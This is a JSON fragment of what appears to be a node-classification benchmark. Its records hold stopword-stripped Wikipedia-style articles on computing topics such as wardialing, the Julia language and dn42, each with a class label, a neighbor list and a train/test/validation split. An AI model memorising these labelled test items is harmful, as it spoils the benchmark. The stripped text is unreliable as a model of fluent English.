      10238
    ],
    "mask": "None"
  },
  {
    "node_id": 6711,
    "label": 7,
    "text": "6fusion:6fusion 6fusion dataservices company headquartered raleigh north carolina enables utility approach it—standardizing economic measurement infrastructure cloud services providing economic transparency global market helping end-users make better informed infrastructure decisions 6fusion ’ uc6 platform organizations view manage total cost consumption tcc business services real time achieve higher level cost optimization forecasting accuracy business agility 6fusion uses patented single unit measure infrastructure called workload allocation cube wac provides common view consumption agnostic underlying technology vendors 6fusion enables baselining benchmarking budgeting business service consumption across execution venues supports dynamic cost optimization strategies 6fusion products metering analytics reporting tools used enterprise organizations service providers cloud brokers company raised total 10m two rounds funding intersouth partners grotech ventures 6fusion product portfolio made following",
    "neighbors": [
      4194
    ],
    "mask": "Test"
  },
  {
    "node_id": 6712,
    "label": 4,
    "text": "Wardialing:wardialing wardialing war dialing technique automatically scan list telephone numbers usually dialing every number local area code search modems computers bulletin board systems computer servers fax machines hackers use resulting lists various purposes hobbyists exploration crackers – malicious hackers specialize breaching computer security – guessing user accounts capturing voicemail greetings locating modems might provide entry-point computer electronic systems may also used security personnel example detect unauthorized devices modems faxes company telephone network single wardialing call would involve calling unknown number waiting one two rings since answering computers usually pick first ring phone rings twice modem hangs tries next number modem fax machine answers wardialer program makes note number human answering machine answers wardialer program hangs depending time day wardialing 10,000 numbers given area code might annoy dozens hundreds people attempt fail answer phone two rings succeed hear wardialing modem carrier tone hang repeated incoming calls especially annoying businesses many consecutively numbered lines exchange used centrex telephone system newer wardialing software warvox require modem conduct wardialing rather programs use voip connections speed number calls wardialer make sandstorm enterprises patent multi-line war dialer system method scan-dialing telephone numbers classifying equipment connected telephone lines associated therewith patented technology implemented sandstorm phonesweep war dialer popular name technique originated 1983 film wargames film protagonist programmed computer dial every telephone number sunnyvale california find computer systems prior movie release technique known hammer dialing demon dialing film introduced method many members 414s 1985 least one company advertised war games autodialer commodore computers programs became common bulletin board systems time file names often truncated wardial.exe like due length restrictions 8 characters systems eventually etymology name fell behind war dialing gained currency within computing culture popularity wardialing 1980s 1990s prompted states enact legislation prohibiting use device dial telephone numbers without intent communicating person recent phenomenon wardriving searching wireless networks wi-fi moving vehicle wardriving named wardialing since techniques involve actively scanning find computer networks aim wardriving collect information wireless access points confused piggybacking similar war dialing port scan tcp/ip dials every tcp port every ip address find services available unlike wardialing however port scan generally disturb human tries ip address regardless whether computer responding address related wardriving warchalking practice drawing chalk symbols public places advertise availability wireless networks term also used today analogy various sorts exhaustive brute force attack authentication mechanism password dictionary attack might involve trying word dictionary password wardialing password would involve trying every possible password password protection systems usually designed make impractical making process slow and/or locking account minutes hours low number wrong password entries",
    "neighbors": [
      5281,
      5189,
      1926,
      7557,
      8488,
      1899,
      10924,
      11341,
      9840,
      7222,
      1625,
      4956,
      11165,
      10110
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6713,
    "label": 6,
    "text": "ZipGenius:zipgenius zipgenius freeware file archiver developed matteo riso m.dev software microsoft windows capable handling nearly two dozen file formats including common formats well password-protect archives work directly cd-r/rw drives presented two editions standard suite suite edition includes optional modules zipgenius project oriented experts power-users standard setup package simply includes main zipgenius application zipgenius first released mr. zip 98 strict group users renamed zipgenius march 1998 april 1999 first public release made zipgenius latest release version 6.3.2.3112 containing large number fixes majority bug fixes visible first glance zipgenius features include support twain devices scanners digital cameras file extraction cd/dvd burner windows xp ftp client ftpgenius zgalbum zgalbum allows users create slideshows pictures loaded folder imported twain device zipgenius also fully integrates windows explorer shell user interface functions placed multiple locations program functions accessed either menu buttons main toolbar drop-down menu customized suit user preferences zipgenius 6 capable opening variety formats commonly used linux rpm tar tar.gz tgz gz 7z regards data security archive history file encrypted recently used files list enabled always per-session disabled cryptozip 2.1 gives encryption algorithms lock user archives users create self-locking/self-erasing archives choose encrypt files one four algorithms czip blowfish twofish rijndael aes also czip files longer depends zipgenius users create executable czip .exe files allow user send encrypted archives people use zipgenius zipgenius reported still development claimed matteo riso main developer focusing next release whose codename miky2007 new version software still branded zipgenius clear 7 2007 beside sure news zipgenius ship developed wininizio software team marking fact zipgenius product wininizio.it wide community board matteo riso admin zipgenius hosted zipgenius.it 2008 wininizio software team put zipgenius.com online offer international website users speaking italian wininizio.it hosts also wide support section — italian english july 1 2009 website zipgenius.it totally redesigned upon modx web application july 6 2009 zipgenius 6.1.0.1010 released public zipgenius able handle open source upx executable compressor used compress zipgenius main executable upx.exe zipgenius program folder users get extra compression level creating new zip archives brutal+upx many executable files exe dll ocx distributed code compilation may larger size necessary zipgenius supports 7-zip compression format conceived igor pavlov compress files standard zip rar compression formats zipgenius supports openoffice.org/staroffice documents openoffice.org applications produce files special format .zip archives custom file extension containing xml files openoffice.org programs merge rebuild original documents zipgenius complies feature allows users manage files common zip files addition users optimize openoffice.org use maximum compression level available .zip format zipgenius users optimize openoffice.org document zipgenius gain 5 10 kb size reduction depending content openoffice.org file zipgenius recompress document brutal compression level",
    "neighbors": [
      6022,
      10121,
      1420,
      6797,
      1940,
      3222,
      9880,
      3114,
      10027,
      7983,
      950,
      823,
      2755,
      11076,
      1352,
      4296,
      10317,
      10575,
      4561,
      722,
      11614,
      1631,
      3296,
      9953,
      5858,
      6759,
      7529,
      4459,
      237,
      1646,
      7667,
      6389,
      4089,
      894,
      10623
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6714,
    "label": 8,
    "text": "Jexus:jexus jexus web server simply jexus proprietary web server developed bing liu jexus supports asp.net stack defined microsoft integrating mono well php via fastcgi early releases announced csdn blog following releases announced primarily chinese forum jexus configured manually editing configuration files since march 2014 lextudio developing management console simplify tasks console aka jexus manager announced april 13 officially console enables local remote management jexus web server",
    "neighbors": [
      1920,
      4485,
      7430,
      9229,
      7567,
      7695,
      1937,
      7443,
      1556,
      8350,
      7457,
      3746,
      8994,
      2596,
      3237,
      9125,
      11682,
      7338,
      9387,
      44,
      11439,
      10800,
      4797,
      10622,
      8644,
      1991,
      11134,
      595,
      1363,
      4439,
      3545,
      225,
      865,
      1250,
      2404,
      4837,
      6379,
      9580,
      2287,
      11376,
      8691,
      10611,
      119,
      11386,
      3966
    ],
    "mask": "Test"
  },
  {
    "node_id": 6715,
    "label": 3,
    "text": "PowerPC_5000:powerpc 5000 powerpc 5000 family series powerpc power isa microprocessors freescale previously motorola stmicroelectronics designed automotive industrial microcontroller system chip soc use mpc5000 family consists two lines 51xx/52xx 55xx/56xx really n't share common heritage mpc5200 family based e300 core mgt5100 processor also part freescale mobilegt platform based e200 core stems mpc5xx core upwards-compatible newer e500 core older powerpc book e specification focus automotive industrial control systems like robotics power train fuel injection cores basis multitude soc controllers ranging 40 600 mhz variety additional functionality like flash-rom ethernet controllers custom i/o mpc55xx processors compliant power isa v.2.03 specification mpc55xx family four slightly different cores really low end high end mpc56xx family powerpc e200 core based microcontrollers jointly developed freescale stmicroelectronics built 90 nm fabrication process microcontrollers tailor-made automotive applications like power steering fuel injection display control powertrain active suspension chassis control anti-lock braking systems radar adaptive cruise control freescale calls processors mpc56xx st names spc56x",
    "neighbors": [
      6914,
      7299,
      3844,
      4868,
      1158,
      3846,
      4743,
      7302,
      5642,
      3467,
      1548,
      1933,
      7305,
      6415,
      3472,
      11405,
      2073,
      7065,
      1563,
      1309,
      10658,
      3493,
      6949,
      6311,
      8102,
      1321,
      9391,
      10543,
      4017,
      5297,
      11314,
      1461,
      11447,
      8120,
      8761,
      9020,
      1725,
      10557,
      1983,
      10945,
      10180,
      3017,
      336,
      8530,
      3540,
      342,
      9302,
      3932,
      11613,
      6878,
      3936,
      10501,
      1635,
      8931,
      7269,
      10214,
      10985,
      9964,
      10734,
      8048,
      3185,
      10224,
      4211,
      5235,
      7286,
      3319,
      8058,
      8700
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6716,
    "label": 3,
    "text": "Zet_(hardware):zet hardware zet clone x86 processor machine code compatible x86 processors developed effort make open-hardware processor hardware design synthesized configurable device fpga cpld custom asic considered soc project supports 16-bit able run dos-compatible windows 3.x operating systems activity zet project since 2013",
    "neighbors": [
      7008,
      6979,
      4773,
      5861,
      10789,
      11333,
      5355,
      3886,
      7983,
      2224,
      3762,
      499,
      11125,
      3159,
      9371,
      8508,
      7421,
      11487
    ],
    "mask": "Test"
  },
  {
    "node_id": 6717,
    "label": 9,
    "text": "AutoLISP:autolisp autolisp dialect programming language lisp built specifically use full version autocad derivatives include autocad map 3d autocad architecture autocad mechanical neither application programming interface api interpreter execute autolisp code included autocad lt product line autolisp small dynamically scoped dynamically typed lisp language dialect garbage collection immutable list structure settable symbols lacking regular lisp features macro system records definition facilities arrays functions variable number arguments let bindings aside core language primitive functions geometry accessing autocad internal dwg database manipulation graphical entities autocad properties graphical entities revealed autolisp association lists values paired autocad group codes indicate properties definitional points radii colors layers linetypes etc autocad loads autolisp code .lsp files autolisp code interact user autocad graphical editor use primitive functions allow user pick points choose objects screen input numbers data autolisp also built-in graphical user interface gui mini- domain-specific language dsl dialog control language creating modal dialog boxes automated layout within autocad autolisp derived early version xlisp created david betz language introduced autocad version 2.18 january 1986 continued enhanced successive releases release 13 february 1995 development neglected autodesk favor fashionable development environments like visual basic applications vba .net framework objectarx however remained autocad main user customizing language vital-lisp considerably enhanced version autolisp including integrated development environment ide debugger compiler activex support developed sold third party developer basis software vital lisp superset existing autolisp language added vba-like access autocad object model reactors event handling autocad objects general activex support general lisp functions autodesk purchased renamed visual lisp briefly sold add-on autocad release 14 released may 1997 incorporated autocad 2000 released march 1999 replacement autolisp since autodesk ceased major enhancements visual lisp focused effort vba .net c++ autodesk longer supports vba versions older 7.1 part long-term process changing vba .net user customizing autolisp strong following computer-aided design cad application vendors add products bricscad intellicad others autolisp functionality autolisp users consider using alternative autocad development involving autolisp since autocad 2000 performed within visual lisp since original autolisp engine replaced visual lisp engine thousands utilities applications developed using autolisp visual lisp distributed lsp fas vlx files simple hello world program autolisp would note final line inside function definition evaluated arguments codice_1 function returns null symbol displayed autocad command-line interface autocad command line functions read–eval–print loop repl would normally print hello world command line followed immediately return value call codice_1 therefore without final call codice_1 function result would codice_5 function may also used achieve result complex example might code defines new function generates autocad point object given point one-line text object displaying x coordinates beside name function includes special prefix c causes autocad recognize function regular command user upon typing 'pointlabel autocad command line would prompted pick point either typing x coordinates clicking location drawing function would place marker point create one-line text object next containing x coordinates point expressed relative active user coordinate system ucs function requires parameters contains one local variable 'pnt example could also written using built-in autocad commands achieve result however approach susceptible changes command prompts autocad releases",
    "neighbors": [
      10752,
      11269,
      2056,
      2062,
      9231,
      7184,
      2577,
      9749,
      8728,
      4633,
      4122,
      8226,
      3119,
      2105,
      3132,
      8258,
      8771,
      8262,
      1613,
      9299,
      10841,
      3675,
      7267,
      2660,
      8293,
      2666,
      5751,
      7805,
      1159,
      9865,
      9877,
      5803,
      2225,
      6840,
      7867,
      4799,
      9926,
      7880,
      8908,
      205,
      5837,
      5852,
      10463,
      7392,
      7904,
      11488,
      11495,
      4846,
      5360,
      5361,
      9969,
      8435,
      9975,
      6906,
      2304,
      4865,
      4867,
      5380,
      3334,
      6919,
      3336,
      10510,
      1301,
      791,
      10012,
      3869,
      2335,
      2849,
      10026,
      7981,
      7983,
      2352,
      10547,
      823,
      311,
      6969,
      10555,
      3408,
      6994,
      1365,
      2392,
      10083,
      6502,
      11625,
      3446,
      10104,
      377,
      4992,
      7562,
      6556,
      6047,
      1952,
      4516,
      5031,
      1448,
      5033,
      9128,
      7616,
      5569,
      6594,
      5059,
      4550,
      11218,
      10712,
      3034,
      3051,
      5611,
      9714,
      3573,
      7670,
      11255
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6718,
    "label": 9,
    "text": "Julia_(programming_language):julia programming language julia high-level general-purpose dynamic programming language designed high-performance numerical analysis computational science also useful low-level systems programming specification language web programming server web use web client programming distinctive aspects julia design include type system parametric polymorphism types fully dynamic programming language multiple dispatch core programming paradigm allows concurrent parallel distributed computing direct calling c fortran libraries without glue code just-in-time compiler referred just-ahead-of-time julia community used julia garbage-collected uses eager evaluation includes efficient libraries floating-point calculations linear algebra random number generation regular expression matching many libraries available including e.g. fast fourier transforms previously bundled julia separate tools available julia include ides integrated tools e.g linter debugger rebugger.jl package supports repeated-execution debugging work julia started 2009 jeff bezanson stefan karpinski viral b. shah alan edelman set create free language high-level fast 14 february 2012 team launched website blog post explaining language mission interview infoworld april 2012 karpinski said name julia good reason really seemed like pretty name bezanson said chose name recommendation friend since 2012 launch julia community grown 9,000,000 downloads used 1,500 universities official julia docker images docker hub seen 4,000,000 downloads january 2019 juliacon academic conference julia users developers held annually since 2014 version 0.3 released august 2014 version 0.4 october 2015 version 0.5 october 2016 julia 0.6 released june 2017 stable release version 8 august 2018 julia 0.7 useful release testing packages knowing upgrade 1.0 version 1.0 released 8 august 2018 work julia 0.7 huge undertaking e.g. entirely new optimizer changes made syntax syntax stable 1.x 0.7 semantics iteration interface simplified release candidate julia 1.0 julia 1.0.0-rc1 released 7 august 2018 final version day later julia 1.1 released 21 january 2019 e.g. new exception stack language feature bugfix releases expected roughly monthly julia 1.1.x 1.0.x 1.0.x currently long-term support least year julia 1.0.1 1.0.4 followed schedule bugfix releases pipeline 0.7-release julia 1.2 released 20 august 2019 julia 1.1.x release longer maintained 1.0.x 1.2.x e.g built-in support web browsers testing running javascript vm packages work julia 1.0.x also work 1.1.x newer enabled forward compatible syntax guarantee major exception interacting non-julia code javacall.jl package however calling languages e.g r language works package r fixed call java scala etc use languages julia e.g jdbc.jl apache spark spark.jl users choose stay lts version julia milestone set fix julia 1.4 however already workaround julia-1.3.0-rc1 julia attracted high-profile users investment manager blackrock uses time-series analytics british insurer aviva uses risk calculations 2015 federal reserve bank new york used julia make models us economy noting language made model estimation 10 times faster previous matlab implementation julia co-founders established julia computing 2015 provide paid support training consulting services clients though julia remains free use 2017 juliacon conference jeffrey regier keno fischer others announced celeste project used julia achieve peak performance 1.54 petaflops using 1.3 million threads 9300 knights landing knl nodes cori cray xc40 supercomputer 5th fastest world time november 2017 8th fastest julia thus joins c c++ fortran high-level languages petaflops computations achieved three julia co-creators recipients 2019 james h. wilkinson prize numerical software awarded every four years creation julia innovative environment creation high-performance tools enable analysis solution computational science problems julia received contributions 800 developers worldwide dr. jeremy kepner mit lincoln laboratory founding sponsor julia project early days addition funds gordon betty moore foundation alfred p. sloan foundation intel agencies nsf darpa nih nasa faa essential development julia julia computing inc. founded 2015 viral b. shah deepak vinchhi alan edelman jeff bezanson stefan karpinski keno fischer june 2017 julia computing raised 4.6m seed funding general catalyst founder collective according official website main features language multiple dispatch also termed multimethods lisp generalization single dispatch polymorphic mechanism used common object-oriented programming oop languages uses inheritance julia concrete types subtypes abstract types directly indirectly subtypes type top type hierarchy concrete types subtyped way languages composition used instead see also inheritance vs subtyping julia draws significant inspiration various dialects lisp including scheme common lisp shares many features dylan also multiple-dispatch-oriented dynamic language features algol-like free-form infix syntax rather lisp-like prefix syntax julia everything expression fortress another numerical programming language features multiple dispatch sophisticated parametric type system common lisp object system clos adds multiple dispatch common lisp functions generic functions julia dylan fortress extensibility default system built-in functions generic extensible dylan multiple dispatch fundamental julia user-defined functions even basic built-in operations like codice_1 generic dylan type system however fully support parametric types typical ml lineage languages default clos allow dispatch common lisp parametric types extended dispatch semantics added extension clos metaobject protocol convergent design fortress also features multiple dispatch parametric types unlike julia however fortress statically rather dynamically typed separate compiling executing phases language features summarized following table default julia runtime must pre-installed user-provided source code run alternatively standalone executable needs julia source code built applicationbuilder.jl packagecompiler.jl julia syntactic macros used metaprogramming like lisp macros powerful different text-substitution macros used preprocessor languages c work level abstract syntax trees asts julia macro system hygienic also supports deliberate capture desired like anaphoric macros using codice_2 construct julia official distribution includes interactive session shell called julia read–eval–print loop repl used experiment test code quickly following fragment represents sample session example strings concatenated automatically println repl gives user access system shell help mode pressing codice_3 codice_4 prompt preceding command respectively also keeps history commands including sessions code tested inside julia interactive section saved file codice_5 extension run command line typing julia supported jupyter online interactive notebooks environment julia practice interoperable many languages julia keyword used call c-exported fortran shared library functions individually julia unicode 12.0 support latest 12.1.0 support adds one letter julia 1.3 utf-8 used strings default julia source code meaning also allowing option common math symbols many operators ∈ codice_6 operator julia packages supporting markup languages html also http xml json bson databases web use general julia core implemented julia c together c++ llvm dependency parsing code-lowering implemented femtolisp scheme dialect llvm compiler infrastructure project used back end generation 64-bit 32-bit optimized machine code depending platform julia runs exceptions e.g. pcre standard library implemented julia notable aspect julia implementation speed often within factor two relative fully optimized c code thus often order magnitude faster python r development julia began 2009 open-source version publicized february 2012 julia uses jit mcjit llvm julia generates native machine code directly function first run bytecodes run virtual machine vm translated bytecode running e.g java jvm dalvik android julia four support tiers currently supports x86-64 processors 64-bit optimized latest generations ia-32 x86 processors except decades old ones i.e. 32-bit mode i686 excepting cpus pre-pentium 4-era supports lower tiers e.g. tier 2 fully supports armv8 aarch64 processors supports armv7 armv6 aarch32 caveats cuda i.e nvidia ptx tier 1 support help external package least platforms may need compiled source code e.g. original raspberry pi options changed download page otherwise executables source available julia successfully built several arm platforms e.g. armv8 data center cloud processors cavium thunderx first arm 48 cores arm v7 32-bit tier 2 support binaries first get x86 arm v8 64-bit ptx 64-bit meaning nvidia cuda gpus external support powerpc 64-bit tier 3 support may may build julia supported raspbian support better newer e.g. armv7 pis julia support promoted raspberry pi foundation also support web browsers/javascript jsexpr.jl alternative language web browsers webassembly support minimal support julia supports several upcoming external julia projects",
    "neighbors": [
      512,
      9224,
      5129,
      2062,
      15,
      1039,
      5148,
      3613,
      9245,
      546,
      5677,
      11310,
      5684,
      9780,
      1591,
      6718,
      10819,
      8262,
      5703,
      8775,
      1101,
      6228,
      2652,
      10848,
      10851,
      9320,
      1130,
      8810,
      5741,
      9330,
      3705,
      7292,
      9345,
      2181,
      7301,
      5255,
      1673,
      6797,
      9875,
      10387,
      9877,
      3734,
      5783,
      7325,
      7326,
      4777,
      7341,
      1203,
      692,
      7347,
      9915,
      2242,
      5830,
      4808,
      5833,
      9416,
      8909,
      7889,
      9944,
      10971,
      228,
      10469,
      10470,
      4840,
      5356,
      8430,
      10991,
      10480,
      7924,
      7421,
      2304,
      5380,
      5896,
      7945,
      2317,
      7950,
      1813,
      5917,
      11555,
      3876,
      10537,
      7983,
      2864,
      6962,
      11574,
      823,
      1849,
      329,
      5450,
      8524,
      847,
      3923,
      2901,
      2903,
      8539,
      10083,
      8549,
      6502,
      8554,
      363,
      3960,
      10618,
      6016,
      3969,
      2948,
      3462,
      8582,
      1931,
      3980,
      8079,
      5521,
      8082,
      2457,
      1435,
      7580,
      1952,
      8609,
      7076,
      5546,
      428,
      9133,
      8113,
      4019,
      6074,
      8644,
      5067,
      7627,
      2000,
      8147,
      5588,
      11219,
      11221,
      2519,
      4057,
      477,
      479,
      4069,
      9701,
      11239,
      3051,
      5612,
      7147,
      7148,
      6134,
      1016,
      8700,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 6719,
    "label": 7,
    "text": "Decentralized_network_42:decentralized network 42 decentralized network 42 also known dn42 decentralized peer-to-peer network built using vpns software/hardware bgp routers darknets try establish anonymity participants dn42 aims network explore routing technologies used internet tries establish direct non-nat-ed connections members network fully meshed dn42 uses mostly tunnels instead physical links individual networks participant connected one participants vpn physical links bgp used inter routing ospf commonly used protocol intra routing participant free choose igp network address space ipv4 consists private subnets 172.20.0.0/14 main subnet note private address ranges may also announced dn42 network interconnected similar projects notably chaosvpn uses 172.31.0.0/16 parts 10.0.0.0/8 icvpn uses 10.0.0.0/8 ipv6 unique local address ula ipv6 equivalent private address range used participants also announce globally routable addresses announcements accepted small subset dn42 order use bgp even private environment autonomous system numbers needed dn42 uses several private reserved numbers ranges including 64512 64855 76100 76199 since june 2014 dn42 using new private range 4242420000 4242429999 part larger private range defined rfc 6996 participants use hardware routers participants use general purpose servers virtual machines lower cost commonly used bgp implementation used dn42 bird quagga participants use openbgpd xorp implementation junos cisco ios",
    "neighbors": [
      8640,
      2085,
      10021,
      3751,
      2825,
      9868,
      5749,
      5085,
      5598
    ],
    "mask": "Test"
  },
  {
    "node_id": 6720,
    "label": 3,
    "text": "Renegade_III:_The_Final_Chapter:renegade iii final chapter renegade iii final chapter scrolling beat'em computer game released amstrad cpc commodore 64 msx zx spectrum systems 1989 ocean software imagine label game sequel sequel arcade game renegade unlike first two games renegade iii follows character known renegade travels time rescue captured girlfriend also dropped two-player mode found previous title though game highly praised critics receiving high scores several prominent gaming publications 91 score awarded crash 84 c+vg derided fans criticised game storyline lack deep gameplay glitches poor physics lack two-player option demonstrated video created internet comedian stuart ashen reviews zx spectrum version repeatedly criticises game whilst praising spectrum versions first two games video also includes fellow youtube user ex-television presenter larry bundy jr reviewing amstrad cpc version video game journalist jon blyth reviewing commodore 64 version game criticising game well spanish magazine microhobby valued game following scores originality 30 graphics 80 motion 80 sound 80 difficulty 100 addiction 80",
    "neighbors": [
      9006
    ],
    "mask": "Train"
  },
  {
    "node_id": 6721,
    "label": 1,
    "text": "Falcon_(storage_engine):falcon storage engine falcon transactional storage engine developed mysql relational database management system development stopped oracle purchased mysql based netfrastructure database engine falcon designed take advantage sun zfs file system architecture analysis showed interesting mixture possible performance properties low level benchmarks first alpha release 5.1.14-falcon showed falcon performed differently innodb myisam better several tests worse others inefficient support mysql limit operation limitation biggest advantage though known ease use falcon requires minimum maintenance designed reconfigure automatically handle types loads efficiently",
    "neighbors": [
      11392,
      8195,
      10258,
      7453,
      1950,
      9503,
      7339,
      7983,
      9010,
      9665,
      8393,
      5964,
      5198,
      7506,
      9687,
      10459,
      6245,
      8295,
      8683,
      5612,
      2413,
      7022,
      3188,
      4598,
      10873,
      2810
    ],
    "mask": "Test"
  },
  {
    "node_id": 6722,
    "label": 9,
    "text": "TACL:tacl tacl tandem advanced command language scripting programming language used tandem computers tacl shell tandem computers originally designed sold tandem computers inc. based cupertino ca first commercially available parallel processing computers originally referred mini-computers tandem strategy emerging concept continuous availability relied mirrored disks controllers software well engineered operating system guardian later nonstop kernel nsk ensure continuous application availability ensuring system could survive single point hardware failure tandem computers inc. acquired compaq computer corporation 1997 compaq computer corp. subsequently purchased hewlett-packard 2001 today known hpe nonstop products hp integrity nonstop blade systems tacl continues scripting language used hewlett packard nonstop servers nonstop servers key components backbone infrastructure largest banks casinos retailers telephone companies email systems stock exchanges worldwide many computer systems produced tandem nonstop platform relied form redundancy hot backup failover scheme continue running tandem nonstop however cpu performs work may contain dormant backup process another cpu pair cpus 0 1 example share hardware ownership controllers disk drives drives redundant writes disk pair performed primary backup drives reads however take advantage head drive closer information choose drive onto perform read example cpu 0 fails cpu 1 takes ownership disk drive providing continuous availability data primary process running may given backup process receives checkpoint information primary process fails whatever reason backup process takes backup process may spawn backup earned name nonstop since application programs fault-tolerant makes attractive customers ability continuous availability nonstop systems also known handling high numbers transactions per second useful banks stock exchanges paragraph describes philosophy behind design hardware software upon nsk platform two programming languages least tal compiled language tacl interpreted language nsk compilers useful languages tal rumoured deprecated tacl remains default scripting language machines hp provide korn-based shell command interface also days offer tacl nsk sysadmins instance netstat command implemented tacl builtins reflect multi-cpu nature nsk probably n't much say fully understand tacl builtins probably well way understanding nsk tacl interpreted tacl instructions stored simple text file macros routines defines make scripts scripts often used store complex configuration instructions start-up hardware configuration sequences tacl language large number built-in utilities allow user capture output various system utilities parse captured text line line character character allows users build tacl programs monitor system events use filters monitor system application event logs create following subroutine file file1 run tacl routine alternate strategy create file named file1 add following two lines execute routine naming file tacl prompt",
    "neighbors": [
      8229,
      1606,
      5384,
      9780,
      6742
    ],
    "mask": "None"
  },
  {
    "node_id": 6723,
    "label": 5,
    "text": "Endpoint_Handlespace_Redundancy_Protocol:endpoint handlespace redundancy protocol endpoint handlespace redundancy protocol used reliable server pooling rserpool framework communication pool registrars maintain synchronize handlespace allocated application layer like aggregate server access protocol work progress within ietf",
    "neighbors": [
      10242,
      6531,
      3847,
      649,
      9868,
      3218,
      9365,
      10005,
      11413,
      5402,
      5531,
      6682,
      3742,
      10271,
      9380,
      2085,
      9381,
      3751,
      3752,
      10924,
      562,
      2996,
      9909,
      10171,
      4797,
      5181,
      3133,
      3006,
      5437,
      7364,
      2887,
      8265,
      2509,
      6733,
      4687,
      5843,
      2904,
      5469,
      5470,
      5471,
      5472,
      10341,
      10344,
      11112,
      367,
      8432,
      6651
    ],
    "mask": "Test"
  },
  {
    "node_id": 6724,
    "label": 3,
    "text": "DoD_IPv6_product_certification:dod ipv6 product certification department defense dod internet protocol version 6 ipv6 product certification program began mandate dod assistant secretary defense networks information integration asd-nii 2005 program mandates joint interoperability test command jitc fort huachuca az test certify products ipv6 capability according request comments rfcs outlined dod ipv6 standards profiles ipv6 capable products products certified special interoperability added dod unified capabilities approved products list uc apl ipv6 list used procurement offices dod u.s. federal agencies ongoing purchases acquisitions equipment february 2009 dod ceased requirement ipv6-only testing certification entry unified capabilities approved products list uc apl according kris strance dod cio ipv6 lead testing ipv6 part product evaluations — much broader scope uc apl single consolidated list products completed interoperability io information assurance ia certification dod ipv6 standards profiles ipv6 capable products dod ipv6 profile singular “ ipv6 capable ” definition dod document lists six agreed upon product classes host router layer 3 switch network appliance security device advanced server corresponding standards rfcs lists standard according level requirement jitc uses publicly available ipv6 generic test plan gtp test product conformance performance interoperability ipv6 according dod ipv6 profile jitc uses combination automated testing tools manual functional test procedures conduct testing many companies organizations help develop test products vendors prior testing jitc organizations grant certification conduct pre-testing ensure vendor product pass necessary certification list organizations ipv6 forum service called ipv6 ready logo service represents qualification program assures devices tested ipv6 capable certified service grants qualified products display logo ipv6 forum present objectives ipv6 experts suggest pursuing purchase devices given phase-2 approval gold logo since given full treatment department defense dod committed ipv6 likely first federal organization completely converted ipv6 also process qualifying ipv6 equipment jitc/disa task certifying ipv6 products given joint interoperability test command jitc part defense information systems agency disa help standardize ipv6 qualification procedures jitc follows ’ called ipv6 generic test plan jitc qualifies product added unified capabilities approved products list fortunately jitc makes list available public http //www.techrepublic.com/blog/networking/ipv6-capable-devices-make-sure-they-are-ready/2522",
    "neighbors": [
      5472,
      10144,
      8482,
      649,
      4687,
      3441,
      4891,
      10461,
      5470
    ],
    "mask": "Test"
  },
  {
    "node_id": 6725,
    "label": 7,
    "text": "Advania:advania advania nordic information technology service corporation headquartered stockholm sweden company largest field iceland 9th largest nordic countries advania corporate clients public private sector provides wide range it-services platforms cloud solutions support multinational enterprises governments big small medium-sized businesses according swedish clients advania sweden leader creating customer value advania traces roots three nordic countries iceland norway sweden long period time country generated component eventually braided one company advania ab 2012 1939 icelandic entrepreneur einar j. skúlason founded ejs office equipment repair workshop reykjavik soon expanded business opened store started importing office machinery cash registers etc world war ii company also repaired guns lighters ejs eventually became dominant business iceland 1952 icelandic government city reykjavik founded skýrr company whose purpose take leading role computing recordkeeping iceland company privatized 1995 later became core element group companies – including ejs – merged skýrr brand 1971 company nokia elektronic ab – later renamed datapoint svenska ab – founded sweden company sold datapoint computer terminals later became network pioneer key system integrator sweden 2003 datapoint merged virtus ab it-company founded 1994 grew rapidly virtus soon became key player swedish market focusing microsoft based solutions offering storage backup services 2003 one strongest comprehensive system integrators sweden created datapoint virtus merged new company named kerfi ab 1991 merkantildata applikasjon founded norway originally business unit within merkantildata later atea company focused implementing erp solutions nordic market industry solutions retail property management logistics legal transport waste management 2000 company changed name hands listed oslo stock exchange 2005 hands unlisted acquired icelandic company kögun later merged skýrr see despite changes ownership hands kept norwegian identity acquired nett.2.3 completo 2005 2012 advania ab born skýrr iceland kerfi sweden hands norway merged became key challenger scandinavian it-market since four companies acquired merged advania listed swedish company caperio included 2018 finnish digital service provider vintor become advania finland advania finland strong roots providing ict services public private sector customers focused providing wide range services related digitalization ict infrastructure",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 6726,
    "label": 1,
    "text": "Norwegian_Ship_Register:norwegian ship register norwegian ship register domestic ship register norway managed norwegian maritime authority physically located bergen registry 12,000 ships include commercial non-commercial vessels ships exceeding mobile offshore installations must registered smaller vessels volunteer norwegian shipbuilding register subordinate register ship registration norway became codified 1902 task handed district courts magistrates city clerks first 50 registers reduced 27 1972 responsibility centralized taken norwegian ship registers 1992 merged maritime authority 2012 third norwegian code signed christian v 15 april 1687 dedicated shipping established principals collateral insurance well arrest procedure following accidents however register ships established 1901 process establish public ship register commenced 1881 background bank considered would purpose lend money purchase ships would require legal framework would firmly establish ownership collateral ships sea law commission appointed 1882 consider legal aspects shipping industry soon became clear commission would ship registration main purpose aspects sea law coordinated internationally reached conclusion resulted 1888 proposal parliament based single central register ships parliament decided consider law similar proposals 1892 1893 1894 1897 similarly dismissed break-through ship registration came 1900–01 parliamentary session private alternative proposal launched. latter instead involved establishing series local registers ship registration act approved parliament 4 may 1901 government commission looked detailed aspects registration council state approved 23 july 1902 resulted fifty district courts given task maintaining local ship registers covering jurisdiction known names bergen ship register first significant reform came 1972 number registers reduced 27 norwegian international ship register nis created 1 july 1987 allowed flag convenience registration ships international traffic remaining norwegian flag jurisdiction instead using local registers nis established office bergen ship register part city clerk bergen nis took march 1990 initiative centralize local ship registers jointly locate nis emphasized nis operated around-the-clock duty service joint location registers would allow economies scale cutting costs would also allow time freed magistrate offices district courts another concern recent rationalization program following introduction electronic registers given little savings due decentralized nature operations parliament looked possibility centralizing local ship registers 1990 issue postponed consider merger nis ministry justice established commission look matter concluded july 1991 registers centralized located bergen proposed new register administratively part maritime authority issue concluded march government decided create norwegian ship registers located bergen would organized government agency subordinate ministry foreign affairs city clerk bergen merged magistrate bergen 1 april 1992 nis split merged office 1 may responsibility local registries transferred new norwegian ship registries 1 july time 12,000 ships registered 880 nis staff nis office increased six eight jobs lost magistrate offices district courts able use workforce tasks norwegian ship registries became part ministry trade industry 1996 minister trade industry trond giske took initiative june 2010 investigate merger norwegian ship registers norwegian maritime authority 